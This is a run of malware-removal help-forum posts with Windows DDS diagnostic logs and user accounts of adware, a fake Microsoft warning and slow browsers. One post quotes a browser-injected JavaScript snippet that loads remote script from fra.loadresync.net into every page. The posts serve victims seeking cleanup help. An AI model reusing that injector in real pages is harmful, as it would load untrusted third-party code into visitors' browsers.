S3 EtronHub3;Etron USB 3.0 Extensible Hub Driver;C:\Windows\System32\drivers\EtronHub3.sys [2013-10-4 65408]
S3 EtronSTOR;Etron Enhance USB BOT/UASP Mass Storage Driver;C:\Windows\System32\drivers\EtronSTOR.sys [2013-10-4 39296]
S3 EtronXHCI;Etron USB 3.0 Extensible Host Controller Driver;C:\Windows\System32\drivers\EtronXHCI.sys [2013-10-4 94208]
S3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver;C:\Windows\System32\drivers\FLxHCIc.sys [2013-10-4 250024]
S3 FLxHCIh;Fresco Logic xHCI (USB3) Hub Device Driver;C:\Windows\System32\drivers\FLxHCIh.sys [2013-10-4 77480]
S3 fssfltr;fssfltr;C:\Windows\System32\drivers\fssfltr.sys [2013-10-4 48488]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2011-5-13 1492840]
S3 iaStorS;iaStorS;C:\Windows\System32\drivers\iaStorS.sys [2013-10-4 652760]
S3 ibtfltcoex;ibtfltcoex;C:\Windows\System32\drivers\iBtFltCoex.sys [2012-8-6 68136]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-9-9 114688]
S3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2013-10-4 452088]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2012-12-10 803872]
S3 ioatdma1;ioatdma1;C:\Windows\System32\drivers\qd162x64.sys [2013-10-4 40144]
S3 ioatdma2;Intel(R) QuickData Technology device ver.2;C:\Windows\System32\drivers\qd262x64.sys [2013-10-4 42192]
S3 McAWFwk;McAfee Activation Service;C:\PROGRA~1\mcafee\msc\mcawfwk.exe [2013-10-4 332080]
S3 MotioninJoyXFilter;MotioninJoy Virtual Xinput device Filter Driver;C:\Windows\System32\drivers\MijXfilt.sys [2013-12-27 121416]
S3 mv91cons;mv91cons;C:\Windows\System32\drivers\mv91cons.sys [2013-10-4 18944]
S3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [2013-2-8 273136]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;C:\Windows\System32\drivers\nusb3hub.sys [2013-10-4 107912]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;C:\Windows\System32\drivers\nusb3xhc.sys [2013-10-4 226696]
S3 NvStUSB;NVIDIA Stereoscopic 3D USB driver;C:\Windows\System32\drivers\nvstusb.sys [2013-10-4 450848]
S3 rccfg;AMD-RAID Config Device;C:\Windows\System32\drivers\rccfg.sys [2013-10-4 21680]
S3 rcraid;rcraid;C:\Windows\System32\drivers\rcraid.sys [2013-10-4 526000]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-21 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-21 31232]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2013-10-27 1255736]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2015-09-14 17:28:09 11745192 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{DA3E3A35-F0A0-4F5A-95CF-B7844E5D8B32}\mpengine.dll
2015-09-14 17:17:56 -------- d--h--w- C:\OneDriveTemp
2015-09-13 17:25:28 -------- d--h--w- C:\$Windows.~BT
2015-09-13 13:56:07 11745192 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-09-12 18:06:52 -------- d-----r- C:\Users\Oscar\Dropbox
2015-09-12 18:04:46 -------- d-----w- C:\Users\Oscar\AppData\Roaming\Dropbox
2015-09-12 18:03:44 -------- d-----w- C:\Program Files (x86)\Dropbox
2015-09-12 18:03:42 -------- d-----w- C:\Users\Oscar\AppData\Local\Dropbox
2015-09-12 18:03:42 -------- d-----w- C:\ProgramData\Dropbox
2015-09-12 10:29:28 -------- d-----w- C:\Users\Oscar\.android
2015-09-09 21:27:53 41984 ----a-w- C:\Windows\System32\UtcResources.dll
2015-09-09 21:26:49 70656 ----a-w- C:\Windows\SysWow64\fontsub.dll
2015-09-08 13:28:15 -------- d-----r- C:\Program Files (x86)\Skype
2015-09-06 16:08:02 1190000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A9AA3DFF-56E4-4F23-92A3-0295AE0A54AB}\gapaengine.dll
2015-09-01 00:56:29 -------- d-----w- C:\Windows\SysWow64\NV
2015-09-01 00:56:29 -------- d-----w- C:\Windows\System32\NV
2015-09-01 00:16:42 50472 ----a-w- C:\Windows\System32\drivers\nvvad64v.sys
2015-09-01 00:16:41 69416 ----a-w- C:\Windows\SysWow64\nvaudcap32v.dll
.
==================== Find3M ====================
.
2015-09-02 03:04:49 41984 ----a-w- C:\Windows\System32\lpk.dll
2015-09-02 03:04:46 100864 ----a-w- C:\Windows\System32\fontsub.dll
2015-09-02 03:04:44 14336 ----a-w- C:\Windows\System32\dciman32.dll
2015-09-02 03:04:42 46080 ----a-w- C:\Windows\System32\atmlib.dll
2015-09-02 02:48:28 10240 ----a-w- C:\Windows\SysWow64\dciman32.dll
2015-09-02 02:48:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2015-09-02 02:47:18 25600 ----a-w- C:\Windows\SysWow64\lpk.dll
2015-09-02 01:51:28 3209216 ----a-w- C:\Windows\System32\win32k.sys
2015-09-02 01:47:08 372736 ----a-w- C:\Windows\System32\atmfd.dll
2015-09-02 01:33:48 299520 ----a-w- C:\Windows\SysWow64\atmfd.dll
2015-08-27 18:18:27 2004480 ----a-w- C:\Windows\System32\msxml6.dll
2015-08-27 18:18:27 1887232 ----a-w- C:\Windows\System32\msxml3.dll
2015-08-27 18:13:03 2048 ----a-w- C:\Windows\System32\msxml6r.dll
2015-08-27 18:13:03 2048 ----a-w- C:\Windows\System32\msxml3r.dll
2015-08-27 17:58:14 1391104 ----a-w- C:\Windows\SysWow64\msxml6.dll
2015-08-27 17:58:14 1241088 ----a-w- C:\Windows\SysWow64\msxml3.dll
2015-08-27 17:51:26 2048 ----a-w- C:\Windows\SysWow64\msxml6r.dll
2015-08-27 17:51:26 2048 ----a-w- C:\Windows\SysWow64\msxml3r.dll
2015-08-27 00:37:01 1423120 ----a-w- C:\Windows\SysWow64\nvspcap.dll
2015-08-27 00:37:01 1316000 ----a-w- C:\Windows\SysWow64\nvspbridge.dll
2015-08-27 00:36:47 1756424 ----a-w- C:\Windows\System32\nvspbridge64.dll
2015-08-27 00:36:47 1710568 ----a-w- C:\Windows\System32\nvspcap64.dll
2015-08-26 18:07:11 98304 ----a-w- C:\Windows\System32\wudriver.dll
2015-08-26 18:07:11 3165696 ----a-w- C:\Windows\System32\wucltux.dll
2015-08-26 18:07:11 192000 ----a-w- C:\Windows\System32\wuwebv.dll
2015-08-26 18:06:43 91136 ----a-w- C:\Windows\System32\WinSetupUI.dll
2015-08-26 18:06:33 12288 ----a-w- C:\Windows\System32\wu.upgrade.ps.dll
2015-08-26 18:06:30 37376 ----a-w- C:\Windows\System32\wuapp.exe
2015-08-26 17:56:25 93184 ----a-w- C:\Windows\SysWow64\wudriver.dll
2015-08-26 17:56:25 173056 ----a-w- C:\Windows\SysWow64\wuwebv.dll
2015-08-26 17:55:37 34816 ----a-w- C:\Windows\SysWow64\wuapp.exe
2015-08-25 14:24:20 937776 ----a-w- C:\Windows\System32\nvvsvc.exe
2015-08-25 14:24:20 75056 ----a-w- C:\Windows\System32\nv3dappshextr.dll
2015-08-25 14:24:20 62584 ----a-w- C:\Windows\System32\nvshext.dll
2015-08-25 14:24:20 385144 ----a-w- C:\Windows\System32\nvmctray.dll
2015-08-25 14:24:20 3496752 ----a-w- C:\Windows\System32\nvsvc64.dll
2015-08-25 14:24:20 2558584 ----a-w- C:\Windows\System32\nvsvcr.dll
2015-08-25 14:24:20 1062520 ----a-w- C:\Windows\System32\nv3dappshext.dll
2015-08-25 14:24:19 6884984 ----a-w- C:\Windows\System32\nvcpl.dll
2015-08-25 12:35:29 5165808 ----a-w- C:\Windows\System32\nvcoproc.bin
2015-08-15 06:34:10 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-08-15 06:33:56 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-08-15 06:18:47 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-08-15 06:18:00 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-08-15 06:17:54 417792 ----a-w- C:\Windows\System32\html.iec
2015-08-15 06:17:49 585216 ----a-w- C:\Windows\System32\vbscript.dll
2015-08-15 06:17:25 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-08-15 06:04:47 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-08-15 06:04:46 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-08-15 06:04:25 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-08-15 06:00:44 5923328 ----a-w- C:\Windows\System32\jscript9.dll
2015-08-15 05:57:20 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-08-15 05:53:22 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-08-15 05:46:15 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-08-15 05:40:29 504832 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-08-15 05:40:12 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-08-15 05:39:32 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-08-15 05:39:22 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-08-15 05:38:34 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-08-15 05:29:36 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-08-15 05:29:12 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-08-15 05:22:47 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-08-15 05:22:03 2126336 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-08-15 05:16:37 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-08-15 05:10:32 4520448 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-08-15 05:07:28 2427392 ----a-w- C:\Windows\System32\wininet.dll
2015-08-15 05:01:47 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-08-15 05:01:23 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-08-15 04:43:00 1951232 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-08-14 10:36:32 1048344 ----a-w- C:\Windows\System32\drivers\aswsnx.sys
2015-08-14 10:36:23 93528 ----a-w- C:\Windows\System32\drivers\aswRdr2.sys
2015-08-14 10:36:23 90968 ----a-w- C:\Windows\System32\drivers\aswMonFlt.sys
2015-08-14 10:36:23 65224 ----a-w- C:\Windows\System32\drivers\aswRvrt.sys
2015-08-14 10:36:23 28656 ----a-w- C:\Windows\System32\drivers\aswHwid.sys
2015-08-14 10:36:23 274808 ----a-w- C:\Windows\System32\drivers\aswVmm.sys
2015-08-14 10:36:23 150672 ----a-w- C:\Windows\System32\drivers\aswStm.sys
2015-08-14 10:36:21 43112 ----a-w- C:\Windows\avastSS.scr
2015-08-14 10:36:16 28144 ----a-w- C:\Windows\System32\drivers\aswKbd.sys
2015-08-14 10:36:14 115152 ----a-w- C:\Windows\System32\drivers\ngvss.sys
2015-08-14 10:36:08 454016 ----a-w- C:\Windows\System32\drivers\aswNdisFlt.sys
2015-08-12 22:10:16 778440 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-08-12 22:10:16 142536 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-08-12 12:04:36 394584 ----a-w- C:\Windows\System32\drivers\RapportKE64.sys
2015-08-12 12:04:36 139896 ----a-w- C:\Windows\System32\drivers\RapportHades64.sys
2015-08-11 04:52:30 72504 ----a-w- C:\Windows\System32\nvaudcap64v.dll
2015-08-07 11:06:30 1898104 ----a-w- C:\Windows\System32\nvdispco6435560.dll
2015-08-07 11:06:30 1558832 ----a-w- C:\Windows\System32\nvdispgenco6435560.dll
2015-08-05 17:56:14 1110016 ----a-w- C:\Windows\System32\schedsvc.dll
2015-08-05 17:56:07 24576 ----a-w- C:\Windows\System32\jnwmon.dll
2015-08-05 17:56:06 275456 ----a-w- C:\Windows\System32\InkEd.dll
2015-08-05 17:40:50 216064 ----a-w- C:\Windows\SysWow64\InkEd.dll
2015-08-04 18:03:10 692672 ----a-w- C:\Windows\System32\winload.efi
2015-08-04 18:00:24 616360 ----a-w- C:\Windows\System32\winresume.efi
2015-08-04 17:56:54 63488 ----a-w- C:\Windows\System32\setbcdlocale.dll
2015-08-04 17:56:37 59392 ----a-w- C:\Windows\System32\appidapi.dll
2015-08-04 17:56:37 32768 ----a-w- C:\Windows\System32\appidsvc.dll
2015-08-04 17:55:57 17920 ----a-w- C:\Windows\System32\appidcertstorecheck.exe
2015-08-04 17:55:57 147456 ----a-w- C:\Windows\System32\appidpolicyconverter.exe
2015-08-04 17:47:42 50688 ----a-w- C:\Windows\SysWow64\appidapi.dll
2015-08-04 16:58:09 61440 ----a-w- C:\Windows\System32\drivers\appid.sys
.
============= FINISH: 3:41:46.07 ===============

Attach.txt should also be attached...

Thank you very much for your help so far. :)

Attached Files
File Type: txt Attach.txt (14.3 KB)

Major Contamination

Hello Experts,

I'll first let you know that your dds scanner wouldn't operate on my laptop which has Win 8.1.
I imagine it is either the same as or a close facsimile to "Combofix" because that wouldn't work on 8.1 either. Because of this I downloaded and ran rkill instead (in safe mode), which came up empty.

Anyway, I have a 3yr old HP 15 laptop which runs an AMD sloth processor.
My anti-virus is the latest ESET and I also have an active Malwarebytes program. I've also run Super anti-spyware with negative results.

Somehow, whatever it is that's infected my system got past these and now it takes nearly two minutes for Internet Explorer to load, as well as significantly slowing down every other process.

I suspect the Trojan? Rootkit? was initiated when I received a warning sheet supposedly from Microsoft with a female voiceover saying my computer had been compromised and that I was to run their new clean up program.

I knew it was suspicious when nothing short of a manual shutdown would stop the warning from continuing. So subsequently, that's what I had to do.
I've run all my malware, spyware, antivirus programs in safe mode, but they all say nothing has been found.
I thought of returning the unit to factory settings, but somehow I doubt whether that will solve my issue.

I've run out of ideas. There is definitely a problem. I hope you can help.

Windjammer14:banghead:

fra.loadresync.net adding lines of code to webpage

In my case I am using Firefox to create automated test cases. During this process I discovered fra.loadresync.net was running and delaying my page loads and actions on a page; anytime the page went to gather information this site would be called. I have researched online and I find very little about this link. During my investigations I found that 2 new lines of code are being added to each page I visit using Firefox. This does not happen on any other browser I use on my computer. I am currently running Windows 10. I have tried using Firefox's page blocking tools and I added a page blocking tool. None of this has helped. The blocking tool eventually blocked me from my own webpage I was trying to test. I have even uninstalled and reinstalled Firefox with no luck.

I have also run several malware tools with no help.

The following lines of code are being added to each page:

(function(d,c,s){ var b={};b.version='114';b.clientuid='03A144c388C33A1C';window._rvz=b;var a=d[c](s);a.src='//fra.loadresync.net/%73d/1060/1052.js';document.body.appendChild(a)})(document,'create'+'Element','script');

<script src="//fra.loadresync.net/%73d/1060/1052.js"></script>

I have worked with my developer, who is in another state, but this is not happening on his install of Firefox. I do not know where to go from here.

Lots of malware installed at once all of a sudden.

Hi there,

Sorry, I tried some removal process before asking here.
It's my 11 yr old daughter's computer. My 6 yr old was doing a Google search and she noticed a spinning wheel and out of curiosity clicked on it. Then something downloaded and asked permission to install. I clicked skip and skip and again skip, but I still noticed a message on the taskbar saying some programs had been installed. I went to check on the programs that had been installed; there were 5-6 of them.
I immediately tried to uninstall them, but as some of them were uninstalled the next one got installed. It went on like this, and I guess about a dozen of them got installed.
I started to run Malwarebytes Anti-Malware, which detected quite a lot (in the hundreds), and the computer restarted. Apparently it was not cleaned (I might have made some mistake here as I was doing it in haste).
I ran it again and this time cleaned it thoroughly. Then I restarted in safe mode and scanned with MBAM; nothing was found this time.
My apps list still has programs like MaxDriverUpdater Services by CSDI, DesktopSearch by Unique Solutions, Note-UP by QUAHOG LIMITED, Search module by Goodzo and space bar use by space bar use. When I click on them it gives an uninstall option, but clicking uninstall does nothing.
Then I ran AdwCleaner, downloaded from bleeping computers, which I think deleted quite a few of them, but I still have some left which cannot be uninstalled.
DDS logs are included and the AdwCleaner log is also included. NOTE: AdwCleaner was run before DDS. Sorry.

Edit: Browser home pages were all changed, which I changed back, and I uninstalled the extensions. Some search bars were added, which were uninstalled through the control panel or by MBAM.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.10240.16412
Run by P at 12:49:58 on 2015-09-17
Microsoft Windows 10 Pro 10.0.10240.0.1252.1.2057.18.4095.2249 [GMT 10:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\system32\sihost.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
svchost.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Users\P\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files\Microsoft Office\Office15\ONENOTEM.EXE
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = Google
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll
BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
uRun: [OneDrive] "C:\Users\P\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
mRun: [LWS] C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
StartupFolder: C:\Users\P\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\SENDTO~1.LNK - C:\Program Files\Microsoft Office\Office15\ONENOTEM.EXE
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office15\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{0ceec13f-8aee-485f-8962-e532f6151bfd} : DHCPNameServer = 192.168.1.1
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files (x86)\Microsoft Office\Office15\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office15\OCHelper.dll
x64-BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll
x64-BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office15\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office15\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\P\AppData\Roaming\Mozilla\Firefox\Profiles\4e2aqbwn.default\
FF - prefs.js: browser.startup.homepage - Google
FF - plugin: C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll
FF - plugin: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
.
============= SERVICES / DRIVERS ===============
.
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2015-7-10 106520]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2015-7-10 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2015-8-15 200528]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2015-7-10 215552]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2015-7-10 83968]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-7-10 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2015-7-16 256992]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2015-7-15 344064]
R2 AODDriver4.2;AODDriver4.2;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2015-7-10 39856]
